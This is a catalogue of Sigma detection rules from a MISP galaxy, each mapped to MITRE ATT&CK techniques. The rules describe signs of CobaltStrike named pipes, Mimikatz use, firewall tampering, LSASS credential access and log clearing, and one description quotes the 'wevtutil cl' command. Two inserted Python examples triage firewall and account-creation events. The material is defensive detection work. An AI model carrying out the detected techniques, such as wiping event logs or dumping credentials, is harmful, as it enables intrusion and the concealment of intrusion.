  • related-to: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 8951. Table References

Links

https://o365blog.com/post/adfs/

https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml

https://github.com/Azure/SimuLand

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_adfs_namedpipe_connection_uncommon_tool.yml

WMI Event Consumer Created Named Pipe

Detects the WMI Event Consumer service scrcons.exe creating a named pipe

The tag is: misp-galaxy:sigma-rules="WMI Event Consumer Created Named Pipe"

WMI Event Consumer Created Named Pipe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 8952. Table References

Links

https://github.com/RiccardoAncarani/LiquidSnake

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_scrcons_wmi_consumer_namedpipe.yml

CobaltStrike Named Pipe Pattern Regex

Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles

The tag is: misp-galaxy:sigma-rules="CobaltStrike Named Pipe Pattern Regex"

CobaltStrike Named Pipe Pattern Regex has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 8953. Table References

Links

https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752

https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_cobaltstrike_re.yml

HackTool - CoercedPotato Named Pipe Creation

Detects the pattern of a pipe name as used by the hack tool CoercedPotato

The tag is: misp-galaxy:sigma-rules="HackTool - CoercedPotato Named Pipe Creation"

HackTool - CoercedPotato Named Pipe Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 8954. Table References

Links

https://blog.hackvens.fr/articles/CoercedPotato.html

https://github.com/hackvens/CoercedPotato

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_coercedpotato.yml

Malicious Named Pipe Created

Detects the creation of a named pipe seen used by known APTs or malware.

The tag is: misp-galaxy:sigma-rules="Malicious Named Pipe Created"

Malicious Named Pipe Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 8955. Table References

Links

https://securelist.com/faq-the-projectsauron-apt/75533/

https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a

https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf

https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity

https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html

https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/

https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/

https://thedfirreport.com/2020/06/21/snatch-ransomware/

https://github.com/RiccardoAncarani/LiquidSnake

https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf

https://www.us-cert.gov/ncas/alerts/TA17-117A

https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_malicious_namedpipes.yml

PUA - RemCom Default Named Pipe

Detects default RemCom pipe creation

The tag is: misp-galaxy:sigma-rules="PUA - RemCom Default Named Pipe"

PUA - RemCom Default Named Pipe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 8956. Table References

Links

https://github.com/kavika13/RemCom

https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_pua_remcom_default_pipe.yml

PsExec Tool Execution From Suspicious Locations - PipeName

Detects PsExec default pipe creation where the executed image is located in a suspicious location, which could indicate that the tool is being used in an attack

The tag is: misp-galaxy:sigma-rules="PsExec Tool Execution From Suspicious Locations - PipeName"

PsExec Tool Execution From Suspicious Locations - PipeName has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 8957. Table References

Links

https://jpcertcc.github.io/ToolAnalysisResultSheet

https://www.jpcert.or.jp/english/pub/sr/ir_research.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_sysinternals_psexec_default_pipe_susp_location.yml

Mimikatz Use

This method detects Mimikatz keywords in different event logs (some of them only appear in older Mimikatz versions that are, however, still used by different threat groups)

The tag is: misp-galaxy:sigma-rules="Mimikatz Use"

Mimikatz Use has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DCSync - T1003.006" with estimative-language:likelihood-probability="almost-certain"

Table 8958. Table References

Links

https://tools.thehacker.recipes/mimikatz/modules

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/win_alert_mimikatz_keywords.yml

New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application

Detects the addition of a new rule to the Windows Firewall exception list for an application located in a potentially suspicious location.

The tag is: misp-galaxy:sigma-rules="New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application"

New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 8959. Table References

Links

https://app.any.run/tasks/7123e948-c91e-49e0-a813-00e8d72ab393/

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml

The Windows Defender Firewall Service Failed To Load Group Policy

Detects activity when The Windows Defender Firewall service failed to load Group Policy

The tag is: misp-galaxy:sigma-rules="The Windows Defender Firewall Service Failed To Load Group Policy"

The Windows Defender Firewall Service Failed To Load Group Policy has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 8960. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_failed_load_gpo.yml

A Rule Has Been Deleted From The Windows Firewall Exception List

Detects when a single rule or all of the rules have been deleted from the Windows Defender Firewall

The tag is: misp-galaxy:sigma-rules="A Rule Has Been Deleted From The Windows Firewall Exception List"

A Rule Has Been Deleted From The Windows Firewall Exception List has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 8961. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_delete_rule.yml

Windows Defender Firewall Has Been Reset To Its Default Configuration

Detects when Windows Defender Firewall has been reset to its default configuration.

The tag is: misp-galaxy:sigma-rules="Windows Defender Firewall Has Been Reset To Its Default Configuration"

Windows Defender Firewall Has Been Reset To Its Default Configuration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 8962. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_reset_config.yml

All Rules Have Been Deleted From The Windows Firewall Configuration

Detects when all of the rules have been deleted from the Windows Defender Firewall configuration.

The tag is: misp-galaxy:sigma-rules="All Rules Have Been Deleted From The Windows Firewall Configuration"

All Rules Have Been Deleted From The Windows Firewall Configuration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 8963. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_delete_all_rules.yml

Windows Firewall Settings Have Been Changed

Detects when the settings of the Windows Firewall have been changed.

The tag is: misp-galaxy:sigma-rules="Windows Firewall Settings Have Been Changed"

Windows Firewall Settings Have Been Changed has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 8964. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_setting_change.yml

Uncommon New Firewall Rule Added In Windows Firewall Exception List

Detects when a rule has been added to the Windows Firewall exception list.

The tag is: misp-galaxy:sigma-rules="Uncommon New Firewall Rule Added In Windows Firewall Exception List"

Uncommon New Firewall Rule Added In Windows Firewall Exception List has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 8965. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_add_rule.yml
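The seven firewall rules above all key on events from the "Windows Firewall with Advanced Security" log, and the two "rule added" rules differ only in whether the program path of the new exception lies in a folder an administrator would not normally whitelist. The triage below is an added example, not code from the Sigma project or from MISP: the event IDs are the ones documented in the Microsoft reference linked above (2002 settings changed, 2004 rule added, 2006 rule deleted, 2009 Group Policy load failure, 2032 reset, 2033 all rules deleted); the record field names (ApplicationPath, RuleName), the suspicious-folder list and the sample events are constructed for the example.

```python
"""Triage of Windows Defender Firewall configuration events, along the
lines of the firewall Sigma rules listed above (added example)."""
from dataclasses import dataclass
from typing import List, Optional

# Event IDs of the "Windows Firewall with Advanced Security/Firewall" log
# (assumption: the classic IDs documented for Windows Server 2008 R2).
EVENT_TITLE = {
    2002: "Windows Firewall Settings Have Been Changed",
    2004: "New Firewall Rule Added In Windows Firewall Exception List",
    2006: "A Rule Has Been Deleted From The Windows Firewall Exception List",
    2009: "The Windows Defender Firewall Service Failed To Load Group Policy",
    2032: "Windows Defender Firewall Has Been Reset To Its Default Configuration",
    2033: "All Rules Have Been Deleted From The Windows Firewall Configuration",
}

# Folders from which an administrator-managed exception is unlikely to be
# created (constructed list); a rule for a binary below any of them is escalated.
SUSPICIOUS_PATH_FRAGMENTS = (
    ":\\users\\public\\",
    ":\\windows\\temp\\",
    ":\\perflogs\\",
    ":\\temp\\",
    "\\appdata\\local\\temp\\",
    "\\appdata\\roaming\\",
    "\\downloads\\",
)


@dataclass
class Finding:
    event_id: int
    title: str
    severity: str
    detail: str


def triage(event: dict) -> Optional[Finding]:
    """Map one firewall event record to a finding, or None when the event
    is not one of the configuration changes covered here."""
    eid = event.get("EventID")
    title = EVENT_TITLE.get(eid)
    if title is None:
        return None
    if eid == 2004:
        app = event.get("ApplicationPath", "")
        if any(frag in app.lower() for frag in SUSPICIOUS_PATH_FRAGMENTS):
            return Finding(eid, title + " For Potential Suspicious Application",
                           "high", app)
        # Exceptions for binaries in expected locations still get a low-priority
        # finding: in most environments new rules are rare enough to review.
        return Finding(eid, "Uncommon " + title, "low",
                       app or event.get("RuleName", ""))
    # Wiping or resetting the whole policy is worse than a single change.
    severity = "high" if eid in (2032, 2033) else "medium"
    return Finding(eid, title, severity, event.get("RuleName", ""))


def triage_all(events) -> List[Finding]:
    return [f for f in map(triage, events) if f is not None]


# Constructed sample records; field names are an assumption, not a real log.
SAMPLE_EVENTS = [
    {"EventID": 2004, "RuleName": "Updater",
     "ApplicationPath": "C:\\Users\\Public\\updater.exe"},
    {"EventID": 2004, "RuleName": "Vendor Agent",
     "ApplicationPath": "C:\\Program Files\\Vendor\\agent.exe"},
    {"EventID": 2006, "RuleName": "Core Networking - DNS (UDP-Out)"},
    {"EventID": 2033},
    {"EventID": 2009},
    {"EventID": 2010},  # not mapped above: ignored
    {"EventID": 2004, "RuleName": "svc",
     "ApplicationPath": "C:\\Windows\\Temp\\svc.exe"},
]

if __name__ == "__main__":
    for f in triage_all(SAMPLE_EVENTS):
        print(f"[{f.severity:6}] {f.event_id} {f.title}: {f.detail}")
```

The path check is deliberately a substring match on a lower-cased path so that both drive-relative (`C:\Users\Public\`) and per-user (`...\AppData\Local\Temp\`) locations are caught without caring which drive or user profile is involved.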

Local User Creation

Detects local user creation on Windows servers, which shouldn’t happen in an Active Directory environment. Apply this Sigma Use Case on your Windows server logs and not on your DC logs.

The tag is: misp-galaxy:sigma-rules="Local User Creation"

Local User Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"

Table 8966. Table References

Links

https://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_creation.yml
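The rule above works because a local account creation and a domain account creation produce the same event ID (4720) but different data: a domain account's SID hangs off the domain SID and its TargetDomainName is the domain, while a local SAM account's SID hangs off the machine SID and its TargetDomainName is the computer's own name. The following is an added example, not code from the Sigma project or from the referenced blog post; the domain name, domain SID, domain controller names and sample records are constructed, while the field names are those of event 4720.

```python
"""Telling a local SAM account creation from a domain account creation in
Security 4720 records (added example)."""
from typing import List, Optional

AD_DOMAIN_NAME = "CORP"                                        # constructed
AD_DOMAIN_SID = "S-1-5-21-1000000001-2000000002-3000000003"    # constructed
DOMAIN_CONTROLLERS = {"DC01", "DC02"}                          # constructed


def is_local_account(event: dict) -> bool:
    """A domain account's SID is <domain SID>-<RID>; anything else logged by
    4720 is an account in a machine's local SAM. The TargetDomainName check is
    a fallback for records where the SID was not captured."""
    sid = event.get("TargetSid", "")
    if sid.startswith(AD_DOMAIN_SID + "-"):
        return False
    return event.get("TargetDomainName", "").upper() != AD_DOMAIN_NAME


def detect(event: dict) -> Optional[dict]:
    if event.get("EventID") != 4720:
        return None
    host = event.get("Computer", "").split(".")[0].upper()
    if host in DOMAIN_CONTROLLERS:
        return None   # DC logs are out of scope: 4720 there means a domain account
    if not is_local_account(event):
        return None
    return {"host": host,
            "account": event.get("TargetUserName", ""),
            "sid": event.get("TargetSid", ""),
            "created_by": event.get("SubjectUserName", "")}


def detect_all(events) -> List[dict]:
    return [hit for hit in map(detect, events) if hit is not None]


# Constructed sample records.
SAMPLE_EVENTS = [
    {"EventID": 4720, "Computer": "SRV01.corp.local", "SubjectUserName": "bob",
     "TargetUserName": "backupadm", "TargetDomainName": "SRV01",
     "TargetSid": "S-1-5-21-4444444444-5555555555-6666666666-1005"},
    {"EventID": 4720, "Computer": "DC01.corp.local", "SubjectUserName": "alice",
     "TargetUserName": "jdoe", "TargetDomainName": "CORP",
     "TargetSid": AD_DOMAIN_SID + "-1105"},
    {"EventID": 4720, "Computer": "SRV02.corp.local", "SubjectUserName": "alice",
     "TargetUserName": "svc_sql", "TargetDomainName": "CORP",
     "TargetSid": AD_DOMAIN_SID + "-1106"},
    {"EventID": 4726, "Computer": "SRV01.corp.local", "SubjectUserName": "bob",
     "TargetUserName": "backupadm", "TargetDomainName": "SRV01",
     "TargetSid": "S-1-5-21-4444444444-5555555555-6666666666-1005"},
    {"EventID": 4720, "Computer": "WS07.corp.local", "SubjectUserName": "helpdesk",
     "TargetUserName": "support", "TargetDomainName": "WS07",
     "TargetSid": "S-1-5-21-7777777777-8888888888-9999999999-1001"},
]

if __name__ == "__main__":
    for hit in detect_all(SAMPLE_EVENTS):
        print(f"local account {hit['account']} ({hit['sid']}) created on "
              f"{hit['host']} by {hit['created_by']}")
```

Checking the SID prefix rather than only the domain name makes the logic robust against a renamed or differently cased TargetDomainName, and the domain controller exclusion implements the "not on your DC logs" advice from the rule description.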

Invoke-Obfuscation COMPRESS OBFUSCATION - Security

Detects obfuscated PowerShell via COMPRESS OBFUSCATION.

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation COMPRESS OBFUSCATION - Security"

Invoke-Obfuscation COMPRESS OBFUSCATION - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 8967. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_compress_services_security.yml

User Couldn’t Call a Privileged Service 'LsaRegisterLogonProcess'

The 'LsaRegisterLogonProcess' function verifies that the application making the call is a logon process by checking that it holds the SeTcbPrivilege privilege. A failed call may indicate Rubeus attempting to obtain a handle to LSA.

The tag is: misp-galaxy:sigma-rules="User Couldn’t Call a Privileged Service 'LsaRegisterLogonProcess'"

User Couldn’t Call a Privileged Service 'LsaRegisterLogonProcess' has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"

Table 8968. Table References

Links

https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml

Addition of SID History to Active Directory Object

An attacker can use the SID history attribute to gain additional privileges.

The tag is: misp-galaxy:sigma-rules="Addition of SID History to Active Directory Object"

Addition of SID History to Active Directory Object has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SID-History Injection - T1134.005" with estimative-language:likelihood-probability="almost-certain"

Table 8969. Table References

Links

https://adsecurity.org/?p=1772

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_add_sid_history.yml

Important Scheduled Task Deleted/Disabled

Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities

The tag is: misp-galaxy:sigma-rules="Important Scheduled Task Deleted/Disabled"

Important Scheduled Task Deleted/Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 8971. Table References

Links

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_delete_or_disable.yml

Remote Access Tool Services Have Been Installed - Security

Detects service installation of various remote access tool software. Such software is often abused by threat actors to perform

The tag is: misp-galaxy:sigma-rules="Remote Access Tool Services Have Been Installed - Security"

Remote Access Tool Services Have Been Installed - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 8972. Table References

Links

https://redcanary.com/blog/misbehaving-rats/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_service_install_remote_access_software.yml

Invoke-Obfuscation Via Use MSHTA - Security

Detects obfuscated PowerShell via use of MSHTA in scripts.

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Use MSHTA - Security"

Invoke-Obfuscation Via Use MSHTA - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 8973. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_mshta_services_security.yml

Potentially Suspicious AccessMask Requested From LSASS

Detects a process handle being opened on the LSASS process with specific, potentially suspicious access masks.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious AccessMask Requested From LSASS"

Potentially Suspicious AccessMask Requested From LSASS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 8974. Table References

Links

https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment

https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump_generic.yml

Failed Code Integrity Checks

Detects code integrity failures such as missing page hashes or corrupted drivers due to unauthorized modification. This could be a sign of tampered binaries.

The tag is: misp-galaxy:sigma-rules="Failed Code Integrity Checks"

Failed Code Integrity Checks has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"

Table 8975. Table References

Links

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6281

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5038

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_codeintegrity_check_failure.yml

Password Policy Enumerated

Detects when the password policy is enumerated.

The tag is: misp-galaxy:sigma-rules="Password Policy Enumerated"

Password Policy Enumerated has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201" with estimative-language:likelihood-probability="almost-certain"

Table 8976. Table References

Links

https://github.com/jpalanco/alienvault-ossim/blob/f74359c0c027e42560924b5cff25cdf121e5505a/os-sim/agent/src/ParserUtil.py#L951

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4661

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_password_policy_enumerated.yml

Device Installation Blocked

Detects an installation of a device that is forbidden by the system policy

The tag is: misp-galaxy:sigma-rules="Device Installation Blocked"

Device Installation Blocked has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hardware Additions - T1200" with estimative-language:likelihood-probability="almost-certain"

Table 8977. Table References

Links

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6423

https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_device_installation_blocked.yml

Suspicious PsExec Execution

Detects execution of PsExec or PAExec with a renamed service name. This helps to filter out the noise when PsExec is used for legitimate purposes, and still fires if an attacker uses a PsExec client other than the Sysinternals one.

The tag is: misp-galaxy:sigma-rules="Suspicious PsExec Execution"

Suspicious PsExec Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 8978. Table References

Links

https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_psexec.yml

Azure AD Health Monitoring Agent Registry Keys Access

This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent. This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent.

The tag is: misp-galaxy:sigma-rules="Azure AD Health Monitoring Agent Registry Keys Access"

Azure AD Health Monitoring Agent Registry Keys Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

Table 8979. Table References

Links

https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_monitoring_agent.yml

https://o365blog.com/post/hybridhealthagent/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml

WMI Persistence - Security

Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.

The tag is: misp-galaxy:sigma-rules="WMI Persistence - Security"

WMI Persistence - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"

Table 8980. Table References

Links

https://twitter.com/mattifestation/status/899646620148539397

https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmi_persistence.yml

Password Protected ZIP File Opened

Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.

The tag is: misp-galaxy:sigma-rules="Password Protected ZIP File Opened"

Password Protected ZIP File Opened has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 8981. Table References

Links

https://twitter.com/sbousseaden/status/1523383197513379841

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip.yml

Persistence and Execution at Scale via GPO Scheduled Task

Detects lateral movement using a scheduled task deployed via GPO, a technique commonly used to deploy ransomware at scale.

The tag is: misp-galaxy:sigma-rules="Persistence and Execution at Scale via GPO Scheduled Task"

Persistence and Execution at Scale via GPO Scheduled Task has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 8982. Table References

Links

https://www.secureworks.com/blog/ransomware-as-a-distraction

https://twitter.com/menasec1/status/1106899890377052160

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_gpo_scheduledtasks.yml

Security Eventlog Cleared

One of the Windows event logs has been cleared, e.g. by execution of the "wevtutil cl" command.

The tag is: misp-galaxy:sigma-rules="Security Eventlog Cleared"

Security Eventlog Cleared has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"

Table 8983. Table References

Links

https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100

https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml

https://twitter.com/deviouspolack/status/832535435960209408

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_audit_log_cleared.yml

Metasploit SMB Authentication

Alerts on authentications to the domain originating from a Metasploit host.

The tag is: misp-galaxy:sigma-rules="Metasploit SMB Authentication"

Metasploit SMB Authentication has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 8984. Table References

Links

https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/lib/rex/proto/smb/client.rb

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_metasploit_authentication.yml

Hacktool Ruler

Detects events that are generated when using the hacktool Ruler by SensePost.

The tag is: misp-galaxy:sigma-rules="Hacktool Ruler"

Hacktool Ruler has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Email Collection - T1114" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"

Table 8985. Table References

Links

https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776

https://github.com/sensepost/ruler/issues/47

https://github.com/sensepost/ruler

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ruler.yml

Malicious Service Installations

Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.

The tag is: misp-galaxy:sigma-rules="Malicious Service Installations"

Malicious Service Installations has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

